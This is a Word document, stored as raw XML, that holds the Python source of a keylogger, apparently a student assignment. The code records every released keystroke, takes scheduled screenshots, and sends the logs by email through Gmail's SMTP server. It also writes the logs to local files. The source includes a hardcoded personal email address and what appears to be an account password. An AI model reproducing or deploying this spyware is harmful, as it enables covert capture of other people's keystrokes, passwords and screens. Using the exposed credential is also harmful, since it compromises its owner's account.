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411B" w14:textId="2BBF44C9" w:rsidR="0092767C" w:rsidRDefault="0092767C" w:rsidP="009276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CODE-KEYLOGGERS(</w:t>
      </w:r>
      <w:r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6B6B3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import keyboard </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FC3475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import smtplib </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A75378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from threading import Timer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDF494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4A09D99E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import pyscreenshot as ImageGrab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EE532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import schedule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF9917B" w14:textId="77777777" w:rsidR="0092767C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import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144EF513" w14:textId="77777777" w:rsidR="0092767C" w:rsidRDefault="0092767C" w:rsidP="0092767C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="341CA82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SEND_REPORT_EVERY = 5 # in seconds, 60 means 1 minute and so on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6AC5BE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EMAIL_ADDRESS = "pvaatheesh@gmail.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D30D5FF" w14:textId="77777777" w:rsidR="0092767C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EMAIL_PASSWORD = "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htcb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hwro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rnrc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kamh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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558E9EE2" w14:textId="77777777" w:rsidR="0092767C" w:rsidRDefault="0092767C" w:rsidP="0092767C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B7218B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class Keylogger:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432A414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interval,take_screenshot,report_method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="email"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471707C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pass SEND_REPORT_EVERY to interval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59912B1D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self.interval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= interval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312FD3A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_method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report_method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D65DA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is the string variable that contains the log of all </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D439F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the keystrokes within `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self.interval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`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC0B89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self.log = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28751B25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start &amp; end datetimes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9F221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06EAFF4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self.end_dt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004F3DFA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'''def start(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B095FB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start datetime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AA86D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7602C7C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keylogger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B724E9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keyboard.on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_release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self.callback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040FF629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reporting the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keylogs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="73632B8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3E88DEF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23DD6665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block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current thread, wait until CTRL+C is pressed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FADF5E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keyboard.wait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()'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC058A4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self, event):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211579CD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4FEE685E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This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is invoked whenever a keyboard event is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occured</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0826AF26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when a key is released in this example)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1A05D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345EFC6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name = event.name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B06839E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(name) &gt; 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F409B6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a character, special key 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ctrl, alt, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44253F44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uppercase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with []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F8FDBA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if name == "space":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622AA33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# " " instead of "space"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C50666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" "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5993231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name == "enter":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB6E1E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a new line whenever an ENTER is pressed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F04667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"[ENTER]\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DC4C55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name == "decimal":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6935F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"."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4728F5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63FB00A4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replace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spaces with underscores</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5471EA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name.replace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(" ", "_")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A2EBC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        name = f"[{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name.upper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()}]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663C465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, add the key name to our global `self.log` variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3162C2D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self.log += name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DA2A3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report(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3091837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596CB0F6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This function gets called every `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self.interval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`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CDB39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It basically sends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keylogs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and resets `self.log` variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236EB89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69AC367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if self.log:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB1991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there is something in log, report it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4AF3DA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self.end_dt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2C79CCA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update `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`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AC45E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self.update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_filename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0702B41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_method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== "email":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC2C16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self.sendmail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(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03823C0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_method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== "file":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36448C9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_to_file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7ED2465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you want to print in the console, uncomment below line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E2188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print(f"[{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}] - {self.log}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D3DC7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21BDB0E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self.log = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05374DB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timer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Timer(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interval=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self.interval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, function=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35ADB5EF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thread as daemon (dies when main thread die)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642951B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timer.daemon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2031972E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timer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2981792F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6712BFC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timer.start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555384D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update_filename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(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001B0BC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construct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filename to be identified by start &amp; end datetimes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289EF66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start_dt_str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str(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)[:-7].replace(" ", "-").replace(":", "")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755FC0F5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end_dt_str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str(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self.end_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:-7].replace(" ", "-").replace(":", "")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757A62A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f"keylog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-{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start_dt_str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}_{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end_dt_str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}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7328616F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report_to_file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(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2ED06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"""This method creates a log file in the current directory that contains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FD69E9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the current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keylogs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in the `self.log` variable"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D50AE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open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file in write mode (create it)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0510121E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with open(f"{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}.txt", "w") as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5493C65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keylogs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to the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442CCF59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self.log, file=f)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061B57B6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print(f"[+] Saved {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}.txt")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6200947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sendmail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self, email, password, message):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4B9D26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manages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a connection to the SMTP server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED89C70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server =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smtplib.SMTP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(host="smtp.gmail.com", port=587)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F6422A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connect to the SMTP server as TLS mode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( for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security )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7055180D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server.starttls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0B889FEA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login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to the email account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136B8AC9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server.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email, password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB7EC0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send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actual message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE6AC6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server.sendmail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(email, email, message)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457189F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terminates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session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC5D32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server.quit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5342F2AF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take_screenshot(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A650A2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"Taking screenshot....")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2143473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2D0F1884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dt_string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self.now.strftime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("%d-%m-%Y %H-%M-%S")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372C4124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image_name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f"screenshot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-{str(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dt_string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)}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CBDCF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screenshot=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ImageGrab.grab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22E8D63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f"D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:/2nd year/{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image_name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}.png"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596F81D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screenshot.save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25D58208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"Screenshot taken.... ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEA2DB9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filepath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="54E8CA4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start(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A3F45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start datetime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E2319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4595EC6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keylogger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239A7895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keyboard.on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_release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self.callback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7810A96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_screenshot()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32405E0A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reporting the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keylogs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6A647C5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2C025C10" w14:textId="77777777" w:rsidR="0092767C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keyboard.wait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71929878" w14:textId="77777777" w:rsidR="0092767C" w:rsidRDefault="0092767C" w:rsidP="0092767C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FF01873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8E6BA2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you want a keylogger to send to your email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267F99B2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keylogger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Keylogger(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interval=SEND_REPORT_EVERY, report_method="email")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0838185C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you want a keylogger to record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keylogs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to a local file </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0B3AF7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(and then send it using your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 xml:space="preserve"> method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E202C1" w14:textId="74E0B229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keylogger = Keylogger(interval=SEND_REPORT_EVERY,take_screenshot="filepath",report_method="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112C82">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019064AF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schedule.every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(5).seconds.do(keylogger.take_screenshot)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B733464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2DAD9741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schedule.every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(5).seconds.do(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keylogger.take_screenshot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77905D0F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2C82">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>schedule.run_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112C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784EF2B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keylogger.take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_screenshot()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C2F649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(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6EF5DB" w14:textId="77777777" w:rsidR="0092767C" w:rsidRPr="00112C82" w:rsidRDefault="0092767C" w:rsidP="0092767C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keylogger.start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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7B6B0E73" w14:textId="77777777" w:rsidR="007A57AF" w:rsidRDefault="007A57AF"/>
    <w:sectPr w:rsidR="007A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7C"/>
    <w:rsid w:val="007A57AF"/>
    <w:rsid w:val="0092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904A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{61715C3C-30DE-4ED0-93D0-3A612AE2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2022-06-08T06:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-08T06:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>